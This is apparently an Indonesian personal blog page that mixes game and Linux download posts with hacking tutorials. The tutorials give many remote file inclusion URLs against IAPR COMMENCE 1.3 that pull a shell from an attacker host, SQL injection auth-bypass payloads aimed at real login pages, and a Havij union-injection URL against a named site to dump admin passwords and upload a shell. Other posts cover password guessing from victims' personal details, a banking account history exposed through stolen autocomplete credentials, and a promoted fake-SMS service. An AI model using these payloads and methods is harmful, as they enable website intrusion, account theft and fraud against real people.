Game Nascar Rumble PC Geme


masih ingat ngak sama tuh game :) yups itu adalah game Ps One.kalau ngak salah dah lamu aku ngak mainin tuh game mungkin juga sahabat yang lain nya heheh
jadi ingat masa kecil dulu,kalau mainin tuh game suka ribut ngak karuan hahah
demi meinggatkan kita akan masa lalu akhir nya nih game ada versi Pc nya jd ngak mesti beli Ps One lagi heheh


Game Nascar Rumble For PC ini di request oleh salah satu sobat blogger, maaf yah kalau lama. Mungkin kedepan nya saya akan mencoba share game yang sudah direquest, seperti Dino Crisis, Digimon World, Suikoden, dll. Buat yang sudah request game tersebut, mohon kesabaran nya yah. Okeii

buat yang suka silakan klik Download Nascar Rumble Pc Game

Read more


Remote File Inclusion

Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:


include($my_ms[”root”].’/error.php’);

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:

http://www.target.com/[Script

Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

2. Setting dalam file PHP.ini

register_globals=On
magic_quotes=off
allow_fopenurl=on

CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :

http://target.com/Commence/includes/

db_connect.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

main_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

output_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

page.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.

Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.

Referensi:

http://www.milw0rm.com

Read more


AutoComplete Kemudahan atau kerawanan

Main#
Adanya fitur AutoComplete ataupun password storage di berbagai macam browser saat ini
merupakan terobosan inovatif, mengingat kemampuan seseorang dalam menghapal. Dengan
fitur ini pula kita dapat mengehemat waktu mengetik dan mengisi kolom username dan password.
Pernahkah anda bermain di suatu kafe internet atau kantor, dan membuka halaman login dari
Email anda mengetik atau menekan 1 huruf depan dari username anda browser saat itu juga langsung
menampilkan pilihan username-username yang sudah pernah diinputkan?? Bila anda memakai komputer
dengan single user mungkin tak masalah, lalu bagaimana bila multiuser?? Ada kemungkinan username
bahkan password anda dapat diambil oleh orang lain.
Berbekal aplikasi password recovery kita dapat mengambil dan membongkar username-password yang
tersimpan ini. Penulis menggunakan Passcape Internet Explorer Password Recovery (www.passcape.com).
Kebetulan Browser di warnet penulis menggunakan Internet Explorer (selanjutnya disingkat menjadi IE saja)
yang fitur AutoComplete sedang menyala.
Install Passcape Internet Explorer Password Recovery (selanjutnya disingkat menjadi PIEPR saja),
lalu pilih metode Recovery yang akan dijalankan :

* AUTOMATIC : akan membuka Password yang tersimpan secara otomatis
* MANUAL : akan membuka Password melalui file ntuser.dat, biasanya di C:\Documents and Settings\%nama_user%
* CONTENT ADVISOR : akan meng-Edit status dan password dari Internet Explorer Content Advisor
* ASTERISKS PASSWORDS : akan membuka “tabir” karakter ‘*’ atau asterik dari kolom password
* MISCELLANEOUS : akan menampilkan macam-macam cookie, cache atau URL yang disimpan oleh IE

Kita akan menggunakan fitur AUTOMATIC untuk membuka password yang tersimpan. Klik Next>> lalu PIEPR akan
menampilkan sejumlah kolom yang berisi keterangan resource IE apa yang dapat dibuka beserta username dan password.

Contoh hasil Recovery PIEPR:

<<>>

Created by Passcape Internet Explorer Password Recovery

IE resource type : IE autocomplete passwords
Resource name : https://ib.bankapajah.co.id/retail/Login.do
User name/Value : xxxxxxx
Password : xxxxxxx

IE resource type : Identity passwords
Resource name : Main Identity
User name/Value :
Password :

PIEPR v1.4.1.170
09-15-2006 10:23:08

Diatas merupakan username dan password dari sebuah session login internet banking di salah satu Bank swasta nasional.
Dapat dibayangkan apa yg terjadi bila kita mempunyai akses untuk melihat, mengubah bahkan mengambil uang dari akun tersebut.
Berikut contoh hasil pemeriksaan saldo dan histori transaksi dari akun tersebut:

NAMA_ORANG_YANG_KENA_TEPU
15 Sep 2006, 12:53:40 HELP

POSISI SALDO

Nomor Transaksi : 0609150069978
Nomor Rekening : xxxxxxxxxxxxx
Jenis Rekening : Tabungan
Tanggal – Jam : 15 September 2006 – 12:53 PM
Posisi Saldo : Rp. 3.352.512,44

HISTORI TRANSAKSI

Nomor Transaksi : 0609150070131
Nomor Rekening : xxxxxxxxxxxxx Rp.
Jenis Rekening : Tabungan
Periode Transaksi : 14 Aug 2006- 15 Sep 2006
Tampilkan Berdasarkan : Tanggal
Urutkan Berdasarkan : Mulai dari yang kecil

Tanggal Keterangan Transaksi Debet Kredit
14/08/2006 VE POS SA
21765315 /0000186584/VAP-SARINAH THA 160.000,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 150.115,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 2.500,00 0,00
15/08/2006 SA ATM Withdrawal
S1AD00FW /7581 /ATM-SPBU P KLP 1.000.000,00 0,00
15/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY – 032 0,00 2.234.825,00
15/08/2006 VE POS SA
00019333 /0000198403/VAP-TOKO GUNUNG 101.000,00 0,00
17/08/2006 SA ATM Withdrawal
S1AD00FW /7878 /ATM-SPBU P KLP 1.000.000,00 0,00
19/08/2006 SA ATM Withdrawal
S1AP125I /3170 /ATM-TMN GALAXY1 500.000,00 0,00
20/08/2006 VE POS SA
61029923 /0000292379/VAP-MDS (ARION 195.000,00 0,00
22/08/2006 SA ATM Withdrawal
S1AP1449 /6920 /ATM-KC T AGUNG1 1.000.000,00 0,00
23/08/2006 SA ATM Withdrawal
S1AM141Z /9388 /ATM-BDR JUANDA2 500.000,00 0,00
26/08/2006 SA ATM Withdrawal
S1AP12EQ /9678 /ATM-METROPOLITA 100.000,00 0,00
27/08/2006 SA ATM Withdrawal
S1AD00FW /1633 /ATM-SPBU P KLP 150.000,00 0,00
28/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY – 031 0,00 13.866.238,00
31/08/2006 Bunga Rekening 0,00 14.740,63
31/08/2006 Biaya Administrasi 7.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September
1250005534326 5.000.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September 1.000,00 0,00
02/09/2006 INT-BK CCPYM CA/SA
4137180305168351 300.000,00 0,00
06/09/2006 INT-BK CCPYM CA/SA
4137180305168351 2.543.987,00 0,00
06/09/2006 INT-B DR SA BILL PMT
030208160140021008226614 170.804,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 150.115,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 2.500,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks
1250005534326 2.500.000,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks 1.000,00 0,00

Saldo Awal : 2.771.729,81
Total Kredit : 16.115.803,63
Total Debet : 15.535.021,00
Saldo Akhir : 3.352.512,44

Waw!!! kita bisa melihat semua transaksi akun tersebut. Apa yang bisa kita lakukan setelah itu? kita bisa melakukan
phising ataupun spamming dengan mengambil data-data penting lainnya, seperti :

UBAH ALAMAT E-MAIL

Nama : NAMA_ORANG_YANG_KENA_TEPU
Tanggal Lahir : 29 February 1900
Alamat E-Mail : KENA_TEPU@mailboongan.com

Solusi#
Bisa kita bayangkan akibat terburuk dari password stealing seperti itu, transfer dana tanapa kita duga, pengambil-alihan
rekening, pengubahan password, hingga pencurian data-data penting kita. Bagaimana kita menghindari hal tersebut?
Aplikasi pembersih Cookie atau cache Browser dapat kita manfaatkan, bahkan dari IE pun sudah ada fitur ini.

> Buka browser IE anda, pilih Tools pada toolbar.
> Pilih Internet Options
> Klik Delete Cookies untuk menghapus cookies anda, Delete Files untuk menghapus file-file temporer dan Clear History untuk
membersihkan sisa-sisa “perjalanan” anda selama browsing.

Bila fitur tersebut dirasa kurang memadai, maka anda dapat menggunakan aplikasi third party, seperti cookies washer atau sejenisnya.
Selain ancaman Password recovery seperti PIEPR, ada aplikasi keylogger yang dapat mencatat semua ketikan anda. Untuk mengakali hal ini,
anda dapat menggunakan fitur on Screen-keyboard Windows.

> Buka menu START, pilih ALL Programs lalu Accessories
> Lalu pilih On-Screen Keyboard.

Kesimpulan#
Pencurian password dan username dalam komputer publik merupakan hal yang wajar mengingat kelemahan sistem yang ada.
Fitur AutoComplete yang disediakan oleh Browser saat ini dapat menjadi bumerang bagi pemakainya apabila tidak berhati-hati
dalam pemakaiannya. Aplikasi Password Recovery seperti PIEPR dapat menampilkan semua username dan password yang pernah disimpan
selama kegiatan Browsing. Lakukan pembersihan Cookies dan History anda setiap kali selesai browsing agar menghindari penyalahgunaan
hak akses.

Penutup#
Penulis tidak bermaksud untuk mengajak pembaca menjadi seorang “PENCURI”, tetapi prihatin atas kurangnya informasi dan kesadaran
dari pengguna komputer publik dalam menjaga rahasia pribadinya. Dengan artikel sederhana (mungkin jelek ) ini penulis ingin membawa
pembaca untuk lebih waspada terhadap teknik-teknik pencurian data rahasia. Semoga artikel ini bermanfaat bagi kita semua. Amien.

Read more


Dasar Dasar SQL injection

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,disini saya cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url.


Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,sekarang kita mulai aja dengan dasar-dasar sql injection.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = ‘echo’ and password=’password’
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near ‘jopi’ SQL atau “Structured Query Language” seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote ‘breaks out’ dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo’;drop table user–
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D oh iya ‘–’ merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.Sekarang untuk lebih jelasnya kita secara langsung pada login script sepertiinput login + password. Nama field nya ‘login’ dan ‘pass’. dan SQL nya di asp:
var sql = select * from users where username=’”+login+”‘ and password=’”+pass”‘”;
coba kalau ada inputan: login: ‘;drop table users– pass: chfn (*wink* negative)pasti ke drop tuh table usersAduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja.
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:’ or 1=1–
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter
atau :
user:’ or 1=1–
admin:’ or 1=1–
Mas , ga bisa nich gimana ya ?Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisabuat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahanpada addressnya seperti memasukan : test’1=1–
menjadi http://victim/index.asp?id=test’1=1
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page targetlalu kita tamhankan hidden field pada source tersebut sebagai contoh :


Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ‘ or 1=1–
Mungkin pada bertanya-tanya kenapa mengunakan variable ‘or 1=1– dan sangat penting.Lihat contohpada sebuah web tertulis http://victim/index.asp?category=laptopDalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request(“category”)
sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory=’laptop’
lalu apa hub dengan ‘or 1=1—
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop’or 1=1–
Kita lihat varible v_cat sekarang menjadi laptop’or 1=1– lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory=’laptop’ or 1=1–’
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkanSql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkankita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda — merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login pageKita bisa masuk kedalam login page tanpa password dan user name :d.Kemungkinan-kemungkinan variable lainya :
or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a


by Skutengboy

Read more


Seni Menebak password

Kita akan membahas teknik Blind Guessing. Teknik ini merupakan dasar dari DictionaryAttack yaitu kita mencoba menebak kemungkinan terbesar dari password. Setelah kita berhasil menyusun kemungkinan tebakan password, kita bisa menggunakan Brute Force Tool seperti Brutus. Para user yg cerdik akan menggunakan password yg sangat sulit ditebak. Bahkan menggunakan kombinasi yg sangat panjang termasuk didalamnya karakter alfanumerik maupun karakter khusus..
Sebagai pertimbangan, gunakan rumus berikut untuk mendapatkan jumlah kemungkinan kombinasi password yg mungkin :

Z=X^Y

untuk :

X = jumlah karakter kombinasi

Y = jumlah karakter password

Z = jumlah kombinasi karakter password

^ = tanda pangkat

Contoh :

Karakter kombinasi adalah “hanya” angka yaitu : (1,2,3,4,5,6,7,8,9,0). Jadi jumlah karakter = 10
Misalnya password yg digunakan hanya 2 karakter (37) maka jumlah karakter password = 2
Maka jumlah kombinasi password yg mungkin terjadi adalah 10^2 = 100

Bisa anda bayangkan jika password berupa kombinasi karakter alfanumerik dan karakter khusus selain panjangnya password, akan banyak sekali kombinasinya. Namun disitulah tatangannya. Sebelum melakukan Blind Guessing, pastikan anda telah mendapatkan informasi tentang korban, misalnya nama, nama org tua, tanggal lahir, nama kekasih dan lainnya. Dapatkan sebanyak mungkin, hal ini akan sangat membantu.

1. Kombinasi Umum
Beberapa user yg malas suka menggunakan kombinasi yg mudah diingat dan sederhana, contoh :

1234567890

0987654321

zxcvbnm

mnbvcxz

asdfghjkl

lkjhgfdsa

qwertyuiop

poiuytrewq

Saya rasa tidak sulit utk menemukan cara mengetiknya.

2. Kombinasi ala Hacker

Hacker suka sekali menggunakan angka menggantikan huruf, contoh : h4ck3r, 70mi, m0b1 dan lainnya. Kemungkinan kombinasi tergantung menurut nama dan beberapa kriteria lain seperti nama kekasih, hobi, nama situs/layanan yg digunakan dan lainnya. contoh :

Nama korban : Master Hacker

Kemungkinan : m4st3r_h4ck3r, m4st3r, h4ck3r

3. Berhubungan dgn nama

Nama : John Doe

Kemungkinan : doe, jdoe, johndoe, jd

4. Berhubungan dgn handle

Nama : John Doe

Handle : tikus

Kemungkinan : jdtikus, tikusdoe, tikusjohn, tikus, rat, doetikus

5. Berhubungan dgn nama kekasih/teman

Nama : John Doe

Kekasih/teman : Fitri

Kemungkinan : johnlovefitri, fitriloveyou, jdf, johnfitri

6. Berhubungan dgn nomor telepon

Nama : John Doe

No.Telepon : 12345

Kemungkinan : jd12345, john12345, doe54321

7. Berhubungan dgn layanan/service yg digunakan

Nama : John Doe

Service : email

Kemungkinan : johnemail, jdemail, doemail, mymail, myemail

Bisa kita lihat dari kombinasi diatas yg sebenarnya masih sangat banyak sekali kemungkinan yg terjadi. Namun beberapa yg cukup akurat adalah kombinasi umum dan kombinasi ala hacker. Sengaja saya sebut kombinasi umum karena dalam banyak review dgn rekan2 dan beberapa kenalan ternyata kombinasi (zxcvbnm) sangat dikenal. Tidak lah begitu sulit utk menghafalnya dan pada dasarnya memang tidak perlu dihafalkan karena memiliki susunan yg unik. Sebagian besar cenderung menggunakan hal2 yg sederhana.
Kombinasi ala hacker juga sering saya jumpai. Dengan teknik sosial dan akses fisik, saya sering menemukan password dgn kombinasi seperti ini. Penggunaan kombinasi ini sangat sederhana dan mudah diingat.

Kombinasi ini sangat berhubungan dgn nama atau handle. Kembali kepada anda, sejauh mana kreatifitas anda, sebanyak apa informasi yg berhasil anda dapatkan akan sangat membantu akurasi penebakan password. Sebagai pengguna layanan dgn otentikasi yg membutuhkan password. Kita tidak pernah lepas dari masalah memilih password yg baik. Password yg baik hendaknya sulit ditebak, tidak berhubungan dgn diri kita atau org terdekat.

Read more


Havij v1.10

------------------------------
STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize


Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumn
pastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--

----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin

Alhamdulillah user/password dan halaman admin sudah ketemu....tinggal di upload shell'y .....
Ry klo ada yang salah - masih newbie Grin
Semoga bermanfaat Grin

Read more


Backtrack 3 Final

Ni dia distro Linux yang ditunggu2 versi Finalnya... Apalagi kalau bukan Backtrack.


Akhirnya datang juga..... Amiennn......



BackTrack adalah salah satu distribusi Linux Live popular yang fokus ditargetkan untuk masalah sekuriti sebagai 'Penetration Testing'. Versi 3 baru saja (2008-06-19) dirilis setelah ia sejak enam bulan (2007-12-14) berstatus beta. Perjalan cukup panjang selama 15 bulan sejak BackTrack 2 (2007-03-07) memastikan kematangan versi final ini.

Distro ini dibangun oleh Mati Aharoni dan Max Moser yang berkolaborasi dengan komunitas pengguna Backtrack di Remote-Exploit. Untuk Backtrack 3 Final ini terdapat 3 versi yaitu :

  • Versi CD Image, dengan nama file bt3-final.iso, dengan ukuran 695 MB.
  • Versi USB (tambahan), dengan nama file bt3final_usb.iso, dengan ukuran 784 MB.
  • Versi Vmware Image, dengan nama file BACKTRACK3_VMWare.rar, dengan ukuran 689 MB.

Untuk versi terbaru ini Backtrack tetap menggunakan desktop KDE dan Fluxbox, tanpa ada perubahan pada versi kernel yaitu kernel 2.6.21.5. Pada versi Bactrack 2 yang telah memuat lebih dari 300 security tool, untuk Bactrack 3 Final akan ditambahkan beberapa tool seperti: SAINT, Maltego v2.0 yang merupakan versi khusus untuk para pengguna Backtrack, spoonwep, fastrack dan banyak lagi, sedangkan Nessus tidak akan di sertakan dalam Backtrack 3 Final ini.

Release Bactrack 3 Final ini selain berisi tool terbaru dan updatenya, juga memperbaiki isu Dual core, kompatibilitas kartu Wireless yang disertai patch untuk melakukan injeksi, peningkatan konfigurasi Xorg, update repositori exploit serta update framework metasploit, melakukan booting dari jaringan (untuk versi USB), dan sebagainya.

Untuk mendownload semua ISOnya, silakan meluncur ke alamat ini:

http://www.remote-exploit.org/backtrack_download.html

Read more


Ultimate Edition 2.0 Release

Ultimate Edition 2.0 ??? apa tuuuuuu....
pada penasarankan,,,,,, hehhehehe ( /me ---- sok tau)

Ultimate Editon 2.0 merupakan turunan Ubuntu Intrepid Ibex. Ultimate Edition 2 direlease dalam 3 versi yaitu 32 bit, 64 bit and versi Gamers edition (x86 )...!!!


Untuk Gamers Edition semua software yang ada pada Ultimate Edition 2.0 juga sudah diikut sertakan didalam ISO-nya.. Namanya juga Gamers Edition... Jadi g sah kan kalau g da gamenya...
Adapun game2 yang telah dipaket dalamISO ini antara lain :
1. Urban Terror ( CS nya GNU )
2. Alien arena 2007
3. Wesnoth
4. etc,,,

capek ngetiknya... ntar u liat aja deh setelah selesai install...

So... Tunggu apalagi.. Buruan download...
NB : ISO ini udah lengkap banget,,, untuk beberapa saat ini, khususnya saat ane posting,,, versi Gamers Edition susah didownload laporannya terlalu banyak yang lagi download, jadi servernya capek melayani tamu2 tak diundang xixixixixxi....Tapi ntar coba aja sendiri mudah2an udah mau,,, tamu2nya udah pada pulang...
!
V
DOWNLOAD HERE

Read more


Rilis Ubuntu 8.10 ( Intrepid Ibex )


Tepat tanggal 30 Oktober 2008, akhirnya Ubuntu 8.10 dengan nama Intrepid Ibex dirilis juga...!

Untuk installasi OS ini,,, minimum memory yang dibutuhkan 256MB, Selain itu,, pada rilis 8.10 ini bug2 yang ada pada ubuntu 8.04 telah di pacth.

Untuk info yang lebih lengkap tentang Rilis 8.10 ini, anda bisa membacanya di sini :

http://www.ubuntu.com/getubuntu/releasenotes/810


Anda bisa mendownload ISO Ubuntu 8.10 DISINI
ato memesan CD nya dari Canonical DISINI ( Gratis lohhhhh, tapi lama baru nyampe ke indo,,, kira2 3 minggu ).

Untuk pemesanan CD nya sekarang Canonical telah menyediakan 3 macam CD, yaitu CD Ubuntu, Kubuntu dan Edubuntu. Semuanya gratisss tisss tisss tisssss.
Jadi tunggu apalagi ... !!!???? Aku mau mesan dulu yach....------ Bubyeeeee..-----

Read more


Linux like Vista ( Dewa Linux )

Untuk pengguna *indowz jangan kuatir untuk beralih ke Linux, karna sekarang sudah ada DewaLinux yang sudah di desain “Windows Looks Like”, di versi sebelumnya DewaLinux beraroma *indoz Xp, tapi untuk versi eiffell ini beraroma *ndowz Vista.

Dewalinux eiffell final release sudah keluar. Didalam rilis terbaru dari dewa linux ini ada beberapa fitur - fitur tambahan dari versi sebelumnya. Perlu diketahui juga DewaLinux eiffell ini di remaster dari Ubuntu 8.04 Hardy Heron LTS.


Yang sudah ngebet pingin coba DewaLinux bisa langsung download di :

ftp://dl2.foss-id.web.id/iso/dewalinux/dewalinux_eiffel.iso

Read more


Free SMS come again !!!

Udah lama banget nich dg posting sms gratis,,,,
mungkin pada rindu jg nich,,,,
mudah2an iya... kalau g.... harus di iyakan aja.... ( maksa mode ON )
Akhirnya sms yang ane tunggu2 datang jg link nya.... hehehe

Ni sepenggal pembicaraan ane dengan master Kemalzack,,,, founder fakesms n sms bulk lainnya... hehehe

kemalzack: promosiin dunk gan http://fakesms.cn/indosat.php
herm4n_20: udah mantap ya
herm4n_20: :D
kemalzack: udah gue bypass pake proxy, paling bzok gue bgusin tampilany aj gan! script udah ok
kemalzack: siap buat kirim jutaan sms
herm4n_20: ok

Tu sms bisa dikirim sesuka hati anda kesemua no indosat...
So silakan dipake sepuasnya...

btw,, bagi yang bersedia,,, tolong bantuin jg ya klik adsense nya
Thanks before

Read more


Backup-restore driver with Driver Magician

